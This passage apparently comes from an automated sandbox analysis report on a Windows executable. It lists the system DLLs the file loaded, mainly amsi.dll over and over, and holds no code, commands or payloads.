              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
